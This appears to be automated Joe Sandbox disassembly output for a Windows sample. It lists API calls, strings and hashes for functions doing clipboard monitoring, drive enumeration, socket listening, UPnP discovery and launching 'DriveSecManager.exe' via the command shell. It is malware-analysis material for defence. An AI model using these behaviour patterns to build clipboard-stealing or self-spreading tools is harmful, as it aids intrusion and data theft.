638->642 639->637 640->628 641->628 642->637 643->644 647 405a85-405a96 GetClipboardData 643->647 645 405b45-405b55 SendMessageA 644->645 646 405b5b 644->646 645->646 646->628 648 405a98 647->648 649 405a9d-405aae GlobalLock 647->649 648->628 650 405ab0 649->650 651 405ab5-405ac6 649->651 650->628 652 405ac8-405acc 651->652 653 405ae9-405afc call 405690 651->653 654 405afe-405b0e call 4057b0 652->654 655 405ace-405ad2 652->655 661 405b11-405b25 GlobalUnlock CloseClipboard 653->661 654->661 657 405ad4 655->657 658 405ad6-405ae7 call 405570 655->658 657->661 658->661 661->644 664 405b27-405b3c call 404970 call 40a1b0 661->664 664->644
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040597C
                                                                    • SetClipboardViewer.USER32(?), ref: 004059C8
                                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 004059DB
                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A30
                                                                    • OpenClipboard.USER32(00000000), ref: 00405A77
                                                                    • GetClipboardData.USER32(00000000), ref: 00405A89
                                                                    • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B90
                                                                    • ChangeClipboardChain.USER32(?,?), ref: 00405B9E
                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 00405BB4
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                    • String ID:
                                                                    • API String ID: 3549449529-0
                                                                    • Opcode ID: 350a456a18ca66a485c2eebe1f768ad2515d325cb078b6b0c19f9934b7d85170
                                                                    • Instruction ID: 2c6a07511b676f4089081adff438ee2b95572153aa6d486a7a165f398962c3b3
                                                                    • Opcode Fuzzy Hash: 350a456a18ca66a485c2eebe1f768ad2515d325cb078b6b0c19f9934b7d85170
                                                                    • Instruction Fuzzy Hash: 9A711A74A00608EBDF14DFA4D988BAF77B4EF48301F14852AE505B6290D779AA80CF69
                                                                    APIs
                                                                    • Sleep.KERNEL32(000003E8), ref: 00406BCE
                                                                    • GetModuleFileNameW.KERNEL32(00000000,00415E58,00000104), ref: 00406BE0
                                                                      • Part of subcall function 0040E770: CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
                                                                      • Part of subcall function 0040E770: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
                                                                      • Part of subcall function 0040E770: CloseHandle.KERNEL32(000000FF), ref: 0040E7B2
                                                                    • ExitThread.KERNEL32 ref: 00406D4A
                                                                      • Part of subcall function 004063A0: GetLogicalDrives.KERNEL32 ref: 004063A6
                                                                      • Part of subcall function 004063A0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
                                                                      • Part of subcall function 004063A0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
                                                                      • Part of subcall function 004063A0: RegCloseKey.ADVAPI32(?), ref: 0040643E
                                                                    • Sleep.KERNEL32(00000BB8), ref: 00406D3D
                                                                      • Part of subcall function 004062C0: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406313
                                                                    • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C7F
                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C94
                                                                    • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406CAF
                                                                    • wsprintfW.USER32 ref: 00406CC2
                                                                    • wsprintfW.USER32 ref: 00406CE2
                                                                    • wsprintfW.USER32 ref: 00406D05
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                    • String ID: (%dGB)$%s%s$Unnamed volume
                                                                    • API String ID: 1650488544-2117135753
                                                                    • Opcode ID: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
                                                                    • Instruction ID: f0476b63a1379e6dca01d87e2afc3553bbde202c422fcd3a3a6a752a7ad43008
                                                                    • Opcode Fuzzy Hash: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
                                                                    • Instruction Fuzzy Hash: 53418471900318ABEB14DB94DD45FEE7778BB44700F1045A9F20AA51D0DB785B94CF6A
                                                                    APIs
                                                                    • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                    • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                      • Part of subcall function 0040D130: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D14E
                                                                    • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                    • setsockopt.WS2_32 ref: 004020D1
                                                                    • htons.WS2_32(?), ref: 00402101
                                                                    • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                    • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                    • WSACreateEvent.WS2_32 ref: 0040213A
                                                                    • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                      • Part of subcall function 0040D160: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
                                                                      • Part of subcall function 0040D160: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
                                                                      • Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
                                                                      • Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
                                                                      • Part of subcall function 0040D160: DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
                                                                      • Part of subcall function 0040D160: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                    • String ID:
                                                                    • API String ID: 1603358586-0
                                                                    • Opcode ID: 37cf53b06a8410454a1798d38201431a2759ba3d0e51bc8328308ef715640324
                                                                    • Instruction ID: bb6f584dfdc5104726d227d4109236b5a11985639f999f99e629cd7821b1dbc1
                                                                    • Opcode Fuzzy Hash: 37cf53b06a8410454a1798d38201431a2759ba3d0e51bc8328308ef715640324
                                                                    • Instruction Fuzzy Hash: 3F41B270640301ABD3209F749C4AF4B77E4AF48710F108A2DF669EA2D4E7F4E845875A
                                                                    APIs
                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
                                                                    • htons.WS2_32(0000076C), ref: 0040D760
                                                                    • inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
                                                                    • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
                                                                      • Part of subcall function 0040AA80: htons.WS2_32(00000050), ref: 0040AAAD
                                                                      • Part of subcall function 0040AA80: socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
                                                                      • Part of subcall function 0040AA80: connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
                                                                      • Part of subcall function 0040AA80: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18
                                                                    • bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
                                                                    • lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
                                                                    • sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
                                                                    • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
                                                                      • Part of subcall function 0040D890: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
                                                                      • Part of subcall function 0040D890: Sleep.KERNEL32(000003E8), ref: 0040D8EE
                                                                      • Part of subcall function 0040D890: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
                                                                      • Part of subcall function 0040D890: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
                                                                      • Part of subcall function 0040D890: StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                    • String ID: 239.255.255.250
                                                                    • API String ID: 726339449-2186272203
                                                                    • Opcode ID: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
                                                                    • Instruction ID: cd66526dcba05d1bd7c9b39ec2501b61c01db5f9fe0ef632d0235bd6d7545576
                                                                    • Opcode Fuzzy Hash: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
                                                                    • Instruction Fuzzy Hash: F64137B5E00208EBDB04DFE4D889BEEBBB5AF48304F108169E515B7390E7B45A44CB69
                                                                    APIs
                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                    • htons.WS2_32(?), ref: 00401508
                                                                    • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                    • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                    • String ID:
                                                                    • API String ID: 4174406920-0
                                                                    • Opcode ID: 13d0b41af5316ea83091654edbd74b2561ef0770db19727e5a4322e68b78e0ff
                                                                    • Instruction ID: 37c3663fbc3c265b2fc21df898a790ae91858f9cd77d7d33374cf85f68206479
                                                                    • Opcode Fuzzy Hash: 13d0b41af5316ea83091654edbd74b2561ef0770db19727e5a4322e68b78e0ff
                                                                    • Instruction Fuzzy Hash: 0331C871A443016BE320DF649C46F9BB6E0AF48B10F50493DF655EB2D0D3B5D544879A
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 0040CD02
                                                                    • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040CD28
                                                                    • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040CD5F
                                                                    • GetTickCount.KERNEL32 ref: 0040CD74
                                                                    • Sleep.KERNEL32(00000001), ref: 0040CD94
                                                                    • GetTickCount.KERNEL32 ref: 0040CD9A
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CountTick$Sleepioctlsocketrecv
                                                                    • String ID:
                                                                    • API String ID: 107502007-0
                                                                    • Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                    • Instruction ID: 0ae774020e9f5877292fe20f0fc2b5ec497076074ae846a5bd2c446efb985cc9
                                                                    • Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                    • Instruction Fuzzy Hash: 4431FC74900209EFCB04DFA8D988BEE7BB1FF44315F10867AE825A7290D7749A51CF95
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 0040646B
                                                                    • CoCreateInstance.OLE32(00412438,00000000,00000001,00412418,?), ref: 00406483
                                                                    • wsprintfW.USER32 ref: 004064B6
                                                                    Strings
                                                                    • /c start %s & start %s\DriveSecManager.exe, xrefs: 004064AA
                                                                    • %comspec%, xrefs: 004064BF
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstancewsprintf
                                                                    • String ID: %comspec%$/c start %s & start %s\DriveSecManager.exe
                                                                    • API String ID: 2038452267-3640840557
                                                                    • Opcode ID: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
                                                                    • Instruction ID: 827debbb99fb5d40cfb779b5d8ae5ab415415813199b490bc36420c15ce2df05
                                                                    • Opcode Fuzzy Hash: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
                                                                    • Instruction Fuzzy Hash: 0C31D875A40208BFDB04DF98D884FDEB7B5EF88704F208199F619A73A4C674AE81CB54
                                                                    APIs
                                                                    • htons.WS2_32(00000050), ref: 0040AAAD
                                                                      • Part of subcall function 0040AA40: inet_addr.WS2_32(0040AAC1), ref: 0040AA4A
                                                                      • Part of subcall function 0040AA40: gethostbyname.WS2_32(?), ref: 0040AA5D
                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
                                                                    • getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18
                                                                    Strings
                                                                    • www.update.microsoft.com, xrefs: 0040AAB7
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                    • String ID: www.update.microsoft.com
                                                                    • API String ID: 4063137541-1705189816
                                                                    • Opcode ID: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
                                                                    • Instruction ID: 53d455f177803832f36bb1991f027e84745f2e467cc2e97abaa02536582c95dc
                                                                    • Opcode Fuzzy Hash: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
                                                                    • Instruction Fuzzy Hash: 09210BB5E103099BCB04DFE8D946AEEBBB5AF4C300F104169E605F7390E7745A45CBAA
                                                                    APIs
                                                                    • NtQueryVirtualMemory.NTDLL ref: 0040F162
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryQueryVirtual
                                                                    • String ID: oA$ oA$ oA
                                                                    • API String ID: 2850889275-3725432611
                                                                    • Opcode ID: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
                                                                    • Instruction ID: 156301bb8e4ac48afa8ff6eb2b3679a4760495b1ce114817f826733a91984271
                                                                    • Opcode Fuzzy Hash: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
                                                                    • Instruction Fuzzy Hash: 3561D635710612CFDB35CE29C88066A33A2EB85354B25857FD805EBAD5E73ADC4AC68C
                                                                    APIs
                                                                    • CryptAcquireContextW.ADVAPI32(Bz@,00000000,00000000,00000001,F0000040,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BE93
                                                                    • CryptGenRandom.ADVAPI32(Bz@,?,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEA9
                                                                    • CryptReleaseContext.ADVAPI32(Bz@,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEB5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                    • String ID: Bz@
                                                                    • API String ID: 1815803762-793989200
                                                                    • Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                    • Instruction ID: 6606508483a264dc8c12e3925f56bba8ecc3e33b87176868a4d93c44792bd7d2
                                                                    • Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                    • Instruction Fuzzy Hash: 87E01275650208BBDB24CFD1EC49FDA776CEB48700F108154F70997280DBB5EA4097A8
                                                                    APIs
                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D55D,00000000), ref: 004013D5
                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                    • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                    • String ID:
                                                                    • API String ID: 3943618503-0
                                                                    • Opcode ID: 68d947c41bdf9a0382415b4c621d22e40d460daea97f1b1ba8e6dd9fd87ffbf0
                                                                    • Instruction ID: f9ba2cfc99a050ce4a8bfcbff2653574801cca82506c6568c29975d90a0f09d7
                                                                    • Opcode Fuzzy Hash: 68d947c41bdf9a0382415b4c621d22e40d460daea97f1b1ba8e6dd9fd87ffbf0
                                                                    • Instruction Fuzzy Hash: 61118974A417106FE320DF749C0AF877AE0AF04B54F50892DF699E72E1E3B49544879A
                                                                    APIs
                                                                    • NtQuerySystemTime.NTDLL(0040B3B5), ref: 0040D4AA
                                                                    • RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Time$QuerySecondsSince1980System
                                                                    • String ID:
                                                                    • API String ID: 1987401769-0
                                                                    • Opcode ID: 5c98a04c039906c0b732b0f639c8761212275eae2c79c402d7dd6553d16f435e
                                                                    • Instruction ID: 284f4c0ca90a751934941b1d9bfeddc82ee070f17a0c71d7a2ad06256d95dcf5
                                                                    • Opcode Fuzzy Hash: 5c98a04c039906c0b732b0f639c8761212275eae2c79c402d7dd6553d16f435e
                                                                    • Instruction Fuzzy Hash: 71D0C779D4010DBBCB00DBE4E84DCDDB77CEB44201F0086D6ED1593150EAB06658CBD5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
                                                                    • Instruction ID: 5fd1260cd0c1bb1f0d43ca887b35fd9fe7aa376b80e30ba4f5f1b1723d8df557
                                                                    • Opcode Fuzzy Hash: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
                                                                    • Instruction Fuzzy Hash: 2C124FF5D00109ABCF14DF98D985AEFB7B5BB98304F10816DE609B7380D739AA41CBA5
                                                                    APIs
                                                                    • GetProcessHeaps.KERNEL32(000000FF,?), ref: 00409EFC
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: HeapsProcess
                                                                    • String ID:
                                                                    • API String ID: 1420622215-0
                                                                    • Opcode ID: 1373c558315c2bb7b1b39264dd611deb399c5604e49ba0dd3c9b15e56f9cb6f7
                                                                    • Instruction ID: 8d4b3b75e0ca4951d81b7fee5ffefe8b4dae6978097e516d12ce04c36a2bdc79
                                                                    • Opcode Fuzzy Hash: 1373c558315c2bb7b1b39264dd611deb399c5604e49ba0dd3c9b15e56f9cb6f7
                                                                    • Instruction Fuzzy Hash: 6B01ECB4904219CADB248F14D9847A9B778AB44304F1081E6D709B7282C2B85ECACF5E
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7a4742e2e7356186e64ac596d0aac80efded56b294b4881e2932ca283d7c95dd
                                                                    • Instruction ID: ad55d0a0fc81490cd0e7a8c39e77b8496904da2014b800c37f86947748ff7242
                                                                    • Opcode Fuzzy Hash: 7a4742e2e7356186e64ac596d0aac80efded56b294b4881e2932ca283d7c95dd
                                                                    • Instruction Fuzzy Hash: DA128CB4D002199FCB08CF99D991AEEFBB2BF88304F24856AE415BB345D334AA15CF54
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
